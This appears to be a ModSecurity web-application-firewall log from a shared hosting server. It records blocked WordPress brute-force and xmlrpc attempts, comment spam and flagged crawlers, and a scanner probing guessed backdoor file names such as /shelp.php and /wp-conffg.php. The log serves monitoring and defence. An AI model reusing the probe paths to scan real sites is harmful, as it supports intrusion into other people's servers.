[Tue May 26 12:47:38.912944 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJEuXLPuWQsfM-UVSlrgAAAH4"]
[Tue May 26 12:47:39.313063 2026] [security2:error] [pid 448967:tid 449164] [client 20.196.127.68:2283] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "mail.thefonemarket.com.md-74.webhostbox.net"] [uri "/1.php"] [unique_id "ahVJE-XLPuWQsfM-UVSlwAAAAEM"]
[Tue May 26 12:47:40.764149 2026] [security2:error] [pid 448967:tid 449173] [client 4.201.75.230:6081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-mail.php"] [unique_id "ahVJFOXLPuWQsfM-UVSl3gAAAEw"]
[Tue May 26 12:47:42.555865 2026] [security2:error] [pid 448967:tid 449108] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJFuXLPuWQsfM-UVSmAwAAAAs"]
[Tue May 26 12:47:42.775604 2026] [security2:error] [pid 448967:tid 449012] [remote 65.2.90.30:44386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVJFuXLPuWQsfM-UVSmDwAAZSw"]
[Tue May 26 12:47:44.607413 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJGOXLPuWQsfM-UVSmRgAAAFc"]
[Tue May 26 12:47:45.674376 2026] [security2:error] [pid 448967:tid 449144] [client 185.191.171.7:30554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/day/2025-07-06/"] [unique_id "ahVJGeXLPuWQsfM-UVSmagAAAC8"]
[Tue May 26 12:47:45.674552 2026] [security2:error] [pid 448967:tid 449144] [client 185.191.171.7:30554] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/day/2025-07-06/"] [unique_id "ahVJGeXLPuWQsfM-UVSmagAAAC8"]
[Tue May 26 12:47:46.921159 2026] [security2:error] [pid 448967:tid 449107] [client 4.201.75.230:5349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-settings.php"] [unique_id "ahVJGuXLPuWQsfM-UVSmjQAAAAo"]
[Tue May 26 12:47:47.661257 2026] [security2:error] [pid 448967:tid 449190] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJG-XLPuWQsfM-UVSmmAAAAF0"]
[Tue May 26 12:47:48.342804 2026] [security2:error] [pid 448967:tid 449100] [client 4.201.75.230:20161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-signup.php"] [unique_id "ahVJHOXLPuWQsfM-UVSmvQAAAAM"]
[Tue May 26 12:47:48.434879 2026] [security2:error] [pid 448967:tid 449104] [client 157.20.138.61:62854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJHOXLPuWQsfM-UVSmvgAAAAc"]
[Tue May 26 12:47:48.435026 2026] [security2:error] [pid 448967:tid 449104] [client 157.20.138.61:62854] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJHOXLPuWQsfM-UVSmvgAAAAc"]
[Tue May 26 12:47:49.812795 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:5476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-start.php"] [unique_id "ahVJHeXLPuWQsfM-UVSm5gAAAFY"]
[Tue May 26 12:47:50.598908 2026] [security2:error] [pid 448967:tid 449201] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJHuXLPuWQsfM-UVSm8QAAAGg"]
[Tue May 26 12:47:51.307620 2026] [security2:error] [pid 448967:tid 449161] [client 4.201.75.230:5820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmlrpc_old.php"] [unique_id "ahVJH-XLPuWQsfM-UVSnFgAAAEA"]
[Tue May 26 12:47:53.466983 2026] [security2:error] [pid 448967:tid 449165] [client 106.216.113.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJIeXLPuWQsfM-UVSnTQAAAEQ"]
[Tue May 26 12:47:53.991529 2026] [security2:error] [pid 448967:tid 449183] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJIeXLPuWQsfM-UVSnYwAAAFY"]
[Tue May 26 12:47:54.525019 2026] [security2:error] [pid 448967:tid 449035] [remote 5.42.158.148:55358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVJIuXLPuWQsfM-UVSnfQAAMUM"]
[Tue May 26 12:47:54.673525 2026] [security2:error] [pid 448967:tid 449219] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJIuXLPuWQsfM-UVSnhwAAAHo"], referer: https://www.anujtradingco.com/
[Tue May 26 12:47:55.159046 2026] [security2:error] [pid 448967:tid 449218] [client 4.201.75.230:5471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xxmlrpc.php"] [unique_id "ahVJI-XLPuWQsfM-UVSnngAAAHk"]
[Tue May 26 12:47:56.961816 2026] [security2:error] [pid 448967:tid 449147] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJJOXLPuWQsfM-UVSnyQAAADI"]
[Tue May 26 12:47:57.025867 2026] [security2:error] [pid 448967:tid 449161] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJJOXLPuWQsfM-UVSn1wAAAEA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 12:47:57.581438 2026] [security2:error] [pid 448967:tid 449160] [client 144.31.108.1:37672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVJJeXLPuWQsfM-UVSn6AAAAD8"], referer: https://moneyapp.com.co/
[Tue May 26 12:47:58.278842 2026] [security2:error] [pid 448967:tid 449199] [client 144.31.108.1:37672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVJJuXLPuWQsfM-UVSn-gAAAGY"], referer: https://moneyapp.com.co/media/astroid/css/debug.css
[Tue May 26 12:47:59.088207 2026] [security2:error] [pid 448967:tid 449216] [client 157.20.138.61:63300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJJuXLPuWQsfM-UVSoEwAAAHc"]
[Tue May 26 12:47:59.088473 2026] [security2:error] [pid 448967:tid 449216] [client 157.20.138.61:63300] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJJuXLPuWQsfM-UVSoEwAAAHc"]
[Tue May 26 12:47:59.782041 2026] [security2:error] [pid 448967:tid 449174] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJJ-XLPuWQsfM-UVSoIQAAAE0"]
[Tue May 26 12:48:01.126477 2026] [security2:error] [pid 448967:tid 449178] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJKeXLPuWQsfM-UVSoQQAAAFE"], referer: https://anujtradingco.com
[Tue May 26 12:48:01.910251 2026] [security2:error] [pid 448967:tid 448970] [remote 88.198.165.116:56732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJKeXLPuWQsfM-UVSoVQAAegI"]
[Tue May 26 12:48:02.304505 2026] [security2:error] [pid 448967:tid 449190] [client 4.201.75.230:5312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-conffg.php"] [unique_id "ahVJKuXLPuWQsfM-UVSoYQAAAF0"]
[Tue May 26 12:48:02.890421 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJKuXLPuWQsfM-UVSoagAAAB4"]
[Tue May 26 12:48:03.926781 2026] [security2:error] [pid 448967:tid 449141] [client 4.201.75.230:5324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/flower.php"] [unique_id "ahVJK-XLPuWQsfM-UVSojwAAACw"]
[Tue May 26 12:48:04.437932 2026] [security2:error] [pid 448967:tid 448973] [remote 84.247.129.9:52826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVJLOXLPuWQsfM-UVSomQAANwU"]
[Tue May 26 12:48:05.148736 2026] [security2:error] [pid 448967:tid 449158] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJLOXLPuWQsfM-UVSopQAAAD0"]
[Tue May 26 12:48:07.377269 2026] [security2:error] [pid 448967:tid 449186] [client 172.236.119.165:5272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahVJLuXLPuWQsfM-UVSozgAAAFk"]
[Tue May 26 12:48:09.191681 2026] [security2:error] [pid 448967:tid 449114] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJMOXLPuWQsfM-UVSpAAAAABE"]
[Tue May 26 12:48:09.484820 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:63684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpDwAAACE"]
[Tue May 26 12:48:09.484950 2026] [security2:error] [pid 448967:tid 449130] [client 157.20.138.61:63684] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpDwAAACE"]
[Tue May 26 12:48:09.984413 2026] [security2:error] [pid 448967:tid 449215] [client 4.201.75.230:5228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/blurbs.php"] [unique_id "ahVJMeXLPuWQsfM-UVSpHQAAAHY"]
[Tue May 26 12:48:11.474072 2026] [security2:error] [pid 448967:tid 449220] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJM-XLPuWQsfM-UVSpPQAAAHs"]
[Tue May 26 12:48:12.987853 2026] [security2:error] [pid 448967:tid 449204] [client 4.201.75.230:5237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/akcc.php"] [unique_id "ahVJNOXLPuWQsfM-UVSpagAAAGs"]
[Tue May 26 12:48:15.575448 2026] [security2:error] [pid 448967:tid 449221] [client 193.37.33.107:62949] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVJN-XLPuWQsfM-UVSpnwAAAHw"]
[Tue May 26 12:48:16.358328 2026] [security2:error] [pid 448967:tid 449110] [client 85.208.96.196:42698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/header-video/"] [unique_id "ahVJOOXLPuWQsfM-UVSpvQAAAA0"]
[Tue May 26 12:48:16.358471 2026] [security2:error] [pid 448967:tid 449110] [client 85.208.96.196:42698] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/header-video/"] [unique_id "ahVJOOXLPuWQsfM-UVSpvQAAAA0"]
[Tue May 26 12:48:16.849116 2026] [security2:error] [pid 448967:tid 449194] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJOOXLPuWQsfM-UVSpwAAAAGE"]
[Tue May 26 12:48:17.551873 2026] [security2:error] [pid 448967:tid 449004] [remote 52.18.195.140:34712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp2gAACCQ"]
[Tue May 26 12:48:17.737658 2026] [security2:error] [pid 448967:tid 449003] [remote 31.24.44.107:33156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp4gAAZCM"]
[Tue May 26 12:48:17.870570 2026] [security2:error] [pid 448967:tid 449177] [client 202.76.142.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJOeXLPuWQsfM-UVSp3gAAAFA"]
[Tue May 26 12:48:18.551961 2026] [security2:error] [pid 448967:tid 449014] [remote 116.202.226.180:55930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.226.202.116.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJOuXLPuWQsfM-UVSp9gAAFy4"]
[Tue May 26 12:48:19.628719 2026] [security2:error] [pid 448967:tid 449137] [client 4.201.75.230:5358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/shelp.php"] [unique_id "ahVJO-XLPuWQsfM-UVSqJwAAACg"]
[Tue May 26 12:48:20.005008 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJO-XLPuWQsfM-UVSqJgAAAFc"]
[Tue May 26 12:48:20.062172 2026] [security2:error] [pid 448967:tid 449105] [client 157.20.138.61:64051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJPOXLPuWQsfM-UVSqOAAAAAg"]
[Tue May 26 12:48:20.062298 2026] [security2:error] [pid 448967:tid 449105] [client 157.20.138.61:64051] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJPOXLPuWQsfM-UVSqOAAAAAg"]
[Tue May 26 12:48:20.501272 2026] [security2:error] [pid 448967:tid 449194] [client 74.7.175.183:39196] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "powersociety.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVJPOXLPuWQsfM-UVSqQAAAYS0"]
[Tue May 26 12:48:21.956393 2026] [security2:error] [pid 448967:tid 449201] [client 195.2.78.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVJPeXLPuWQsfM-UVSqZgAAAGg"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:22.321375 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJPeXLPuWQsfM-UVSqaQAAAHk"]
[Tue May 26 12:48:23.975327 2026] [security2:error] [pid 448967:tid 449191] [client 4.201.75.230:5901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/cord.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlQAAAF4"]
[Tue May 26 12:48:23.982479 2026] [security2:error] [pid 448967:tid 449210] [client 195.2.78.191:60928] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.2.78.191" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlgAAAHE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:23.982585 2026] [security2:error] [pid 448967:tid 449210] [client 195.2.78.191:60928] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJP-XLPuWQsfM-UVSqlgAAAHE"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:25.114046 2026] [security2:error] [pid 448967:tid 449185] [client 176.111.37.216:53222] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 216.37.111.176.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqrgAAAFg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:25.114155 2026] [security2:error] [pid 448967:tid 449185] [client 176.111.37.216:53222] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJQeXLPuWQsfM-UVSqrgAAAFg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
